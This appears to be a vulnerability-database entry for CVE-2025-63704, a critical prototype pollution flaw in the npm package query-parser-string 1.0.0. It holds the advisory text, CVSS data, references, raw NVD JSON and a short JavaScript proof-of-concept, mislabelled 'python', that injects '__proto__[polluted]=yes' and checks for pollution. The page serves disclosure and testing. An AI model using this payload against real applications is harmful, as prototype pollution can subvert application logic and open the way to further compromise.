CVE-2025-63704

Description

NPM package query-parser-string 1.0.0 is vulnerable to Prototype Pollution. The package does not properly sanitize user supplied query parameters and merges them to the newly created object.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

query-parser-string 1.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2025-63704: Prototype Pollution in query-parser-string

const parser = require('query-parser-string');

// 1. Craft a malicious payload targeting the prototype
// The payload attempts to inject a property into Object.prototype
const maliciousQuery = '__proto__[polluted]=yes';

console.log('Testing CVE-2025-63704...');

// 2. Parse the malicious query string using the vulnerable package
try {
    const result = parser.parse(maliciousQuery);

    // 3. Verify if the pollution was successful
    // If successful, an empty object {} will now have the 'polluted' property
    if ({}.polluted === 'yes') {
        console.log('[+] VULNERABLE: Prototype Pollution successful!');
        console.log('[+] {}.polluted =', {}.polluted);
    } else {
        console.log('[-] NOT VULNERABLE: Prototype pollution did not occur.');
    }
} catch (e) {
    console.error('Error during PoC execution:', e);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63704
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63704
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63704/
[4] VulDB https://vuldb.com/cve/CVE-2025-63704
[5] https://gist.github.com/6en6ar/d62f614dbb2b1032b5e45a56fe26ec8b
[6] https://github.com/victorteokw/query-string-parser/issues/3
[7] https://www.npmjs.com/package/query-string-parser?activeTab=readme

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63704", "sourceIdentifier": "[email protected]", "published": "2026-05-07T16:16:17.697", "lastModified": "2026-05-08T22:16:28.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NPM package query-parser-string 1.0.0 is vulnerable to Prototype Pollution. The package does not properly sanitize user supplied query parameters and merges them to the newly created object."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1321"}]}], "references": [{"url": "https://gist.github.com/6en6ar/d62f614dbb2b1032b5e45a56fe26ec8b", "source": "[email protected]"}, {"url": "https://github.com/victorteokw/query-string-parser/issues/3", "source": "[email protected]"}, {"url": "https://www.npmjs.com/package/query-string-parser?activeTab=readme", "source": "[email protected]"}]}}